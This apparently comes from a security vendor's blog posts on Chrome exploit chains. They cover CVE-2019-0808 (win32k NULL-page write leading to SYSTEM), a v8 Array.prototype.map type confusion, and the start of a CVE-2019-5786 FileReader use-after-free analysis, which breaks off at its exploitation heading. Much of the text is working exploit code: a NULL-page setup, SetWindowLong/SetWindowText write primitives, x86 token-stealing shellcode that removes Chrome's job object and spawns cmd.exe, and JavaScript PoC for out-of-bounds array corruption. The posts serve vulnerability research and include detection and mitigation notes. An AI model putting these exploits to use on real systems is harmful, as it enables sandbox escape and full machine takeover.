By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique.
Leaking the Address of pPopupMenu for Write Address Calculations
Before continuing, lets reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax
if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
result = 0;
else
result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}
Notice that on line 8 there are two components which make up the final address which is returned. These are pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which will point to offset 0x34 in the NULL page. Without the ability to determine the values of both of these items, the attacker will not be able to fully control what address is returned by MNGetpItemFromIndex(), and henceforth which address xxxMNSetGapState() writes to in memory.
There is a solution for this however, which can be observed by viewing the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to set the value of the variable addressToWriteTo which is used to set the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to.
LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){
printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");
printf("[*] Restoring window procedure...\r\n");
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);
/* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex,
except wParam has been subtracted by minus 0x10. Code adjusts this below to accommodate.
This is an important information leak as without this the attacker
cannot manipulate the values returned from MNGetpItemFromIndex, which
can result in kernel crashes and a dramatic decrease in exploit reliability.
*/
UINT pPopupAddressInCalculations = wParam + 0x10;
// Set the address to write to to be the right bit of cbwndExtra in the target tagWND.
UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));
To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use.
LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned
// handle is a handle to
// a window object. Set v1 to
// TRUE if all is good.
...
During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value returned from xxxSendMessage() to ensure it the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().
Setting up the Memory in the NULL Page
Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out:
0x20
0x34
0x4C
0x50 to 0x1050
This can be seen in more detail in the following diagram.
NULL page utilization
The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done as spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer will ensure that spMenu->cItems is greater than the value of pPopupMenu, which will prevent MNGetpItemFromIndex() from returning 0 instead of result. This can be seen on line 5 of the following code.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax
if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur
// here if spMenu is NULL.
result = 0;
else
result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}
Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation shown on line 8 will set result to the address of primaryWindow‘s cbwndExtra field, minus an offset of 0x4.
The other offsets require a more detailed explanation. The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.
.text:BF975EA3 mov eax, [ebx+14h] ; EAX = ppopupmenu->spmenu
.text:BF975EA3 ;
.text:BF975EA3 ; Should set EAX to 0 or NULL.
.text:BF975EA6 push dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the
.text:BF975EA6 ; value at address 0x4C given that
.text:BF975EA6 ; ppopupmenu->spmenu is NULL.
.text:BF975EA9 push eax ; spMenu. Will be NULL or 0.
.text:BF975EAA call MNGetpItemFromIndex
..............
.text:BF975EBA add ecx, [eax+28h] ; ECX += pItemFromIndex->yItem
.text:BF975EBA ;
.text:BF975EBA ; pItemFromIndex->yItem will be the value
.text:BF975EBA ; at offset 0x28 of whatever value
.text:BF975EBA ; MNGetpItemFromIndex returns.
...............
.text:BF975ECE cmp ecx, ebx
.text:BF975ED0 jg short loc_BF975EDB ; Jump to loc_BF975EDB if the following
.text:BF975ED0 ; condition is true:
.text:BF975ED0 ;
.text:BF975ED0 ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))
As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner.
To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes at offset 0x50 to 0x1050 within the NULL page to 0xF0 the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD it will result in pItemFromIndex->yItem being set to 0xF0F0F0F0. This will cause the first half of the following calculation to always be a very large unsigned integer, and henceforth the jump will always be taken.
Forming a Stronger Write Primitive by Using the Limited Write Primitive
Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.
After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle
// is a handle to a window object.
// Set v1 to TRUE if all is good.
If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow‘s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.
void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
...
var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write
// operation should occur, minus an
// offset of 0x4.
temp_var_PITEM = var_PITEM;
if ( var_PITEM )
{
...
var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the
// address where the second write operation
// should occur, minus an offset of 0x4. This
// address will be 0x6C bytes earlier in
// memory than the address in var_PITEM.
if ( fSet )
{
*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the
// attacker controlled address.
if ( var_PITEM_Minus_Offset_Of_0x6C )
{
*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
// Conduct the second write to the attacker
// controlled address minus 0x68 (0x6C-0x4).
Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.
else {
if ((cwp->message == 0x1E5)) {
UINT offset = 0; // Create the offset variable which will hold the offset from the
// start of hPrimaryWindow's cbwnd data field to write to.
UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set
// addressOfStartofPrimaryWndCbWndData to the address of
// the start of hPrimaryWindow's cbwnd data field.
// Set offset to the difference between hSecondaryWindow's
// strName.Buffer's memory address and the address of
// hPrimaryWindow's cbwnd data field.
offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
printf("[*] Offset: 0x%08X\r\n", offset);
// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),
// or the address of the bServerSideWindowProc bit.
if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
ExitProcess(-1);
}
else {
printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
}
This code will start by checking if the window message was 0x1E5. If it was then the code will calculate the distance between the start of primaryWindow‘s wndExtra data section and the location of secondaryWindow‘s strName.Buffer pointer. The difference between these two locations will be saved into the variable offset.
Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow‘s strName.Buffer pointer to the address of secondaryWindow‘s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.
Using SetWindowLong() to change secondaryWindow’s strName.Buffer pointer
By performing this action, when SetWindowText() is called on secondaryWindow, it will proceed to use its overwritten strName.Buffer pointer to determine where the write should be conducted, which will result in secondaryWindow‘s bServerSideWindowProc flag being overwritten if an appropriate value is supplied as the lpString argument to SetWindowText().
Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit
Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow‘s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow.
// Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer
// field to set the bServerSideWindowProc bit in hSecondaryWindow.
if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
ExitProcess(-1);
}
else {
printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
The following diagram shows what secondaryWindow‘s tagWND layout looks like before and after the SetWindowTextA() call.
Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText()
Setting the bServerSideWindowProc flag ensures that secondaryWindow‘s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.
Effect of setting bServerSideWindowProc
Stealing the Process Token and Removing the Job Restrictions
Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code.
printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
if (success == TRUE) {
printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
ExitProcess(-1);
}
The WM_ENTERIDLE message will then be picked up by secondaryWindow‘s window procedure sprayCallback(). The code for this function can be seen below.
// Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for
// additional insight into how this function should operate. Note that a token stealing shellcode
// is called here only because trying to spawn processes or do anything complex as SYSTEM
// often resulted in APC_INDEX_MISMATCH errors and a kernel crash.
LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
if (uMsg == WM_ENTERIDLE) {
WORD um = 0;
__asm
{
// Grab the value of the CS register and
// save it into the variable UM.
mov ax, cs
mov um, ax
}
// If UM is 0x1B, this function is executing in usermode
// code and something went wrong. Therefore output a message that
// the exploit didn't succeed and bail.
if (um == 0x1b)
{
// USER MODE
printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
ExitProcess(-1); // Bail as if this code is hit either the target isn't
// vulnerable or something is wrong with the exploit.
}
else
{
success = TRUE; // Set the success flag to indicate the sprayCallback()
// window procedure is running as SYSTEM.
Shellcode(); // Call the Shellcode() function to perform the token stealing and
// to remove the Job object on the Chrome renderer process.
}
}
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
As the bServerSideWindowProc flag has been set in secondaryWindow‘s tagWND object, sprayCallback() should now be running as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, then inlined shellcode will ensure that sprayCallback() is indeed being run as the SYSTEM user. If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed.
Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below.
// Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.
// Essentially a standard token stealing shellcode, with two lines
// added to remove the Job object associated with the Chrome
// renderer process.
__declspec(noinline) int Shellcode()
{
__asm {
xor eax, eax // Set EAX to 0.
mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
// _KTHREAD is located at FS:[0x124]
mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
mov ecx, eax // Copy current process _EPROCESS structure
xor edx, edx // Set EDX to 0.
mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL.
mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0B8h
cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
mov [ecx + 0xF8], edx // Assign SYSTEM process token.
}
}
The modification takes the EPROCESS structure for Chrome renderer process, and NULLs out its Job pointer. This is done because during experiments it was found that even if the shellcode stole the SYSTEM token, this token would still inherit the job object of the Chrome renderer process, preventing the exploit from being able to spawn any child processes. NULLing out the Job pointer within the Chrome renderer process prior to changing the Chrome renderer process’s token removes the job restrictions from both the Chrome renderer process and any tokens that later get assigned to it, preventing this from happening.
To better understand the importance of NULLing the job object, examine the following dump of the process token for a normal Chrome renderer process. Notice that the Job object field is filled in, so the job object restrictions are currently being applied to the process.
To confirm these restrictions are indeed in place, one can examine the process token for this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes.
Job restrictions on the Chrome renderer process preventing spawning of child processes
If the Job field within this process token is set to NULL, WinDBG’s !process command no longer associates a job with the object.
Examining Process Explorer once again confirms that since the Job field in the Chrome render’s process token has been NULL’d out, there is no longer any job associated with the Chrome renderer process. This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process since no job is associated with it anymore, which means it can now spawn any child process it wishes.
No job object is associated with the process after the Job pointer is set to NULL
Spawning the New Process
Once Shellcode() finishes executing, WindowHookProc() will conduct a check to see if the variable success was set to TRUE, indicating that the exploit completed successfully. If it has, then it will print out a success message before returning execution to main().
if (success == TRUE) {
printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
ExitProcess(-1);
}
main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.
// Execute command if exploit success.
if (success == TRUE) {
WinExec("cmd.exe", 1);
}
Demo Video
The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.
Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode applications which exhibit this behavior are likely malicious since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection.
Mitigation
Running Windows 8 or higher prevents attackers from being able to exploit this issue since Windows 8 and later prevents applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slidedeck), which means that attackers can’t allocate the NULL page or memory near the null page such as 0x30. Additionally upgrading to Windows 8 or higher will also allow Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from being able to call NtUserMNDragOver() to trigger this vulnerability.
On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.
Conclusion
Developing a Chrome sandbox escape requires a number of requirements to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to make a working sandbox exploit from a bug in win32k.sys to illustrate the 0Day exploit chain originally described in Google’s blog post.
The timely and detailed analysis of vulnerabilities are some of benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.
This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.
Author: István Kurucsai
Chrome Release Schedule
Chrome has a relatively tight release cycle of pushing a new stable version every 6 weeks with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, while security fixes are immediately visible in the source tree, they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user-base.
In effect, there’s a window of opportunity for attackers ranging from a couple days to weeks in which the vulnerability details are practically public yet most of the users are vulnerable and cannot obtain a patch.
Open Source Patch Analysis
Looking through the git log of v8 can be an overwhelming experience. There was a change however that caught my attention immediately. The fix has the following commit message:
[TurboFan] Array.prototype.map wrong ElementsKind for output array.
The associated chromium issue tracker entry is restricted and likely to remain so for months. However, it has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which can also help shorten exploit development time.
The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:
+// If the array length >= kMaxFastArrayLength, then CreateArray +// will create a dictionary. We should deopt in this case, and make sure +// not to attempt inlining again. + original_length = effect = graph()->NewNode( + simplified()->CheckBounds(p.feedback()), original_length, + jsgraph()->Constant(JSArray::kMaxFastArrayLength), effect, control); + // Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the // exceptional projections because it cannot throw with the given parameters.
Node* a = control = effect = graph()->NewNode(
javascript()->CreateArray(1, MaybeHandle<AllocationSite>()),
array_constructor, array_constructor, original_length, context,
outer_frame_state, effect, control);
JSCallReducer runs during the InliningPhase of TurboFan, its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive, the added lines insert a check to verify that the length of the array is below kMaxFastArrayLength (which is 32 MiB). This length is passed to CreateArray, which returns a new array.
The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.
So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.
Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.
Looking at the regression test included in the fix, it feeds the mapping function with feedback for an array with contiguous storage (Lines 6-13), then after it’s been optimized by Turbofan, invokes it with an array that is large enough so that the output of map will end up with dictionary element kind.
// Copyright 2019 the V8 project authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file.
// Set up a fast holey smi array, and generate optimized code.
let a =[1,2,,,,3]; function mapping(a){ return a.map(v => v); }
mapping(a);
mapping(a); %OptimizeFunctionOnNextCall(mapping);
mapping(a);
// Now lengthen the array, but ensure that it points to a non-dictionary // backing store.
a.length=(32*1024*1024)-1;
a.fill(1,0);
a.push(2);
a.length+=500; // Now, the non-inlined array constructor should produce an array with // dictionary elements: causing a crash.
mapping(a);
Exploitation
Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the loop of map needs to be stopped. This is possible by providing a callback function that raises an exception after the desired number of iterations. Another issue is that it overwrites everything linearly without skips, while ideally we would like to only selectively overwrite a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:
map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).
So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The PoC code below utilizes both of these behaviors to overwrite the length of an array adjacent to the map output array.
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);
// we are aiming for the following object layout // [output of Array.map][packed float array] // First the length of the packed float array is corrupted via the original vulnerability,
// offset of the length field of the float array from the map output const float_array_len_offset =23;
// Set up a fast holey smi array, and generate optimized code.
let a =[1, 2, ,,, 3];
var float_array;
function mapping(a){
function cb(elem, idx){ if(idx ==0){
float_array =[0.1, 0.2]; } if(idx > float_array_len_offset){ // minimize the corruption for stability throw"stop"; } return idx; }
// Now lengthen the array, but ensure that it points to a non-dictionary // backing store.
a.length=(32*1024*1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);
a.push(2);
a.length+=500;
// Now, the non-inlined array constructor should produce an array with // dictionary elements: causing a crash.
cnt =1; try{
mapping(a); }catch(e){
console.log(float_array.length);
console.log(float_array[3]); }
At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:
[output of Array.map][packed float array][typed array][obj]
The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it then reading their address through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution by creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to find it in memory and place the shellcode there.
The full exploit code which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019) can be found on our github and it can be seen in action below. It’s quite reliable and could also be integrated with a Site-Isolation based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.
The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.
This post provides detailed analysis and an exploit achieving remote code execution for the recently fixed Chrome vulnerability that was observed by Google to be exploited in the wild.
Author: István Kurucsai
Patch Analysis
The release notes from Google are short on information as usual:
[$N/A][936448] High CVE-2019-5786: Use-after-free in FileReader. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2019-02-27
As described on MDN, the “FileReader object lets web applications asynchronously read the contents of files (or raw data buffers) stored on the user’s computer, using File or Blob objects to specify the file or data to read”. It can be used to read the contents of files selected in a file open dialog by the user or Blobs created by script code. An example usage is shown in below.
1 2 3 4 5 6 7 8 9 10 11 12 13
let reader =new FileReader();
reader.onloadend=function(evt){
console.log(`contents as an ArrayBuffer: ${evt.target.result}`); }
reader.onprogress=function(evt){
console.log(`read ${evt.target.result.byteLength} bytes so far`); }
let contents ="filecontents";
f =new File([contents],"a.txt");
reader.readAsArrayBuffer(f);
It is important to note that the File or Blob contents are read asynchronously and the user JS code is notified of the progress via callbacks. The onprogress event may be fired multiple times while the reading is in progress, giving access to the contents read so far. The onloadend event is triggered once the operation is completed, either in success or failure.
Searching for the issue number in the Chromium git logs quickly reveals the patch for the vulnerability, which alters a single function. The original, vulnerable version is shown below.
This function gets called each time the result property is accessed in a callback after a FileReader.readAsArrayBuffer call in JavaScript.
While the object hierarchy around the C++ implementation of ArrayBuffers is relatively complicated, the important pieces are described below. Note that the C++ namespaces of the different classes are included so that distinguishing between objects implemented in Chromium (the WTF and blink namespaces) and v8 (everything under the v8 namespace) is easier.
WTF::ArrayBuffer: the embedder-side (Chromium) implementation of the ArrayBuffer concept. WTF::ArrayBuffer objects are reference counted and contain the raw pointer to their underlying memory buffer, which is freed when the reference count of an ArrayBuffer reaches 0.
blink::DOMArrayBufferBase: a garbage collected class containing a smart pointer to a WTF::ArrayBuffer.
blink::DOMArrayBuffer: class inheriting from blink::DOMArrayBufferBase, describing an ArrayBuffer in Chromium. Represented in the JavaScript engine by a v8::internal::JSArrayBuffer instance.
WTF::ArrayBufferBuilder: helper class to construct a WTF::ArrayBuffer incrementally. Holds a smart pointer to the ArrayBuffer.
blink::FileReaderLoader: responsible for loading the File or Blob contents. Uses WTF::ArrayBufferBuilder to build the ArrayBuffer as the data is read.
Comparing the code to the fixed version shown below, the most important difference is that if loading is not finished, the patched version creates new ArrayBuffer objects using the ArrayBuffer::Create function while the vulnerable version simply passes on a reference to the existing ArrayBuffer to the DOMArrayBuffer::Create function. ToArrayBuffer always returns the actual state of the ArrayBuffer being built but since the reading is a asynchronous, it may return the same one under some circumstances.
What are those circumstances? The raw_data_ variable in the code is of the type ArrayBufferBuilder, which is used to construct the result ArrayBuffer from the incrementally read data by dynamically allocating larger and larger underlying ArrayBuffers as needed. The ToArrayBuffer method returns a smart pointer to this underlying ArrayBuffer if the contents read so far fully occupy the currently allocated buffer and creates a new one via slicing if the buffer is not fully used yet.
One way to abuse the multiple references to the same ArrayBuffer is by detaching the ArrayBuffer through one and using the other, now dangling, reference. The javascript postMessage() method can be used to send messages to a JS Worker. It also has an additional parameter, transfer, which is an array of Transferable objects, the ownership of which are transfered to the Worker.
The transfer is done by the blink::SerializedScriptValue::TransferArrayBufferContents function, which iterates over the DOMArrayBuffers provided in the transfer parameter to postMessage and invokes the Transfer method of each, as shown below. blink::-DOMArrayBuffer::Transfer calls into WTF::ArrayBuffer::Transfer, which transfers the ownership of the underlying data buffer.
The vulnerability can be triggered by passing multiple blink::DOMArrayBuffers that reference the same underlying ArrayBuffer to postMessage. Transferring the first will take ownership of its buffer, then the transfer of the second will fail because its underlying ArrayBuffer has already been neutered. This causes blink::SerializedScriptValue::TransferArrayBufferContents to enter an error path, freeing the already transferred ArrayBuffer but leaving a dangling reference to it in the second blink::DOMArrayBuffer, which can then be used to access the freed memory through JavaScript.
SerializedScriptValue::TransferArrayBufferContents(
... for(auto* it = array_buffers.begin(); it != array_buffers.end();++it){
DOMArrayBufferBase* array_buffer_base =*it; if(visited.Contains(array_buffer_base)) continue;
visited.insert(array_buffer_base);
wtf_size_t index =static_cast<wtf_size_t>(std::distance(array_buffers.begin(), it));
... DOMArrayBuffer* array_buffer =static_cast<DOMArrayBuffer*>(array_buffer_base);
if(!array_buffer->Transfer(isolate, contents.at(index))){
exception_state.ThrowDOMException(DOMExceptionCode::kDataCloneError, "ArrayBuffer at index "+
String::Number(index)+ " could not be transferred."); return ArrayBufferContentsArray(); } }
Exploitation
